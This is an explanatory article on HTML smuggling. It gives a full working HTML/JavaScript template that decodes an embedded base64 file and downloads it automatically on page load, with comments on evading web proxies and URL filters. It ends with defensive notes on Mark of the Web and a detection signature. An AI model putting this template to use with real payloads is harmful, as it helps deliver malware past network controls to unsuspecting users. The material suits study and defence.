HTML smuggling is a technique for delivering a file to a target without a web proxy, web application firewall or network AV ever seeing a download URL for it — there is none to inspect. The file bytes are embedded in the page itself (typically base64 inside its JavaScript) and reassembled client-side into a Blob that the browser saves locally, so the only thing that crosses the wire is a request for an ordinary HTML page.
Example
The sample HTML code below demonstrates HTML smuggling (not to be confused with HTTP request smuggling, an unrelated server-side technique). After setting the `file` variable to the base64-encoded file contents, host the HTML. Any browser that loads the page will automatically download the embedded file.
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
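/**
 * Decode a base64 string into an ArrayBuffer holding the raw file bytes.
 *
 * This is the client-side reconstruction step of the smuggle: the payload
 * never travels as its own HTTP response, so URL/download filters sitting on
 * the wire only ever see the HTML page that carries the string.
 *
 * @param {string} base64 - standard base64 (not URL-safe), padding included
 * @returns {ArrayBuffer} the decoded bytes, exactly as long as the payload
 * @throws {DOMException} InvalidCharacterError from atob() when `base64` is
 *   malformed; the caller then gets no file rather than a truncated one
 */
function convertFromBase64(base64) {
  // globalThis.atob is the same function as window.atob in a browser; using
  // globalThis keeps the helper usable outside a window context (e.g. tests).
  const binaryString = globalThis.atob(base64);
  // atob() yields a "binary string": one char per byte, code points 0..255,
  // so charCodeAt(0) is an exact byte value and no text decoding happens here.
  const bytes = Uint8Array.from(binaryString, (ch) => ch.charCodeAt(0));
  return bytes.buffer;
}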
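// Payload to drop, as base64 text (use `base64` to encode the file contents).
// It is only a string literal inside the page, so nothing on the wire ever
// requests it as a separate file.
const file = 'VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
const data = convertFromBase64(file);
// 'application/octet-stream' is the registered generic binary type; the
// original 'octet/stream' is not a valid MIME type. The `download` attribute
// below is what forces a save either way, but a correct type avoids relying
// on browser content sniffing.
const blob = new Blob([data], { type: 'application/octet-stream' });
const fileName = 'test.txt';

// Legacy IE / pre-Chromium Edge path. The feature test and the call now name
// the same API (the original tested msSaveOrOpenBlob but invoked msSaveBlob,
// so the guard did not actually protect the call).
if (window.navigator && window.navigator.msSaveBlob) {
  window.navigator.msSaveBlob(blob, fileName);
} else {
  // Standard path: a hidden anchor with a `download` attribute pointing at an
  // object URL for the blob. Clicking it triggers a normal browser download,
  // which the browser still tags with Mark-of-the-Web like any other download.
  const anchor = document.createElement('a');
  anchor.style.display = 'none';
  document.body.appendChild(anchor);
  const url = window.URL.createObjectURL(blob);
  anchor.href = url;
  anchor.download = fileName;
  anchor.click();
  // Clean up: the original left the hidden <a> in the DOM and revoked the
  // object URL synchronously after click(). Removing the anchor and deferring
  // the revoke to the next task lets a browser that begins consuming the blob
  // asynchronously still read it before the URL is released.
  document.body.removeChild(anchor);
  setTimeout(() => window.URL.revokeObjectURL(url), 0);
}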
</script>
</body>
</html>
The downloaded file does not bypass Windows Defender / SmartScreen: the browser writes it to disk like any other download, so it still carries the Mark of the Web (the Zone.Identifier alternate data stream) and remains subject to SmartScreen, Defender and Office Protected View. HTML smuggling evades URL-based and proxy inspection on the wire, not endpoint controls. From the defensive side, the page itself is the artifact: the `atob` / `Blob` / `createObjectURL` / `download` pattern in the script above is visible in the served HTML and is a reasonable signature for content inspection or a web proxy to flag.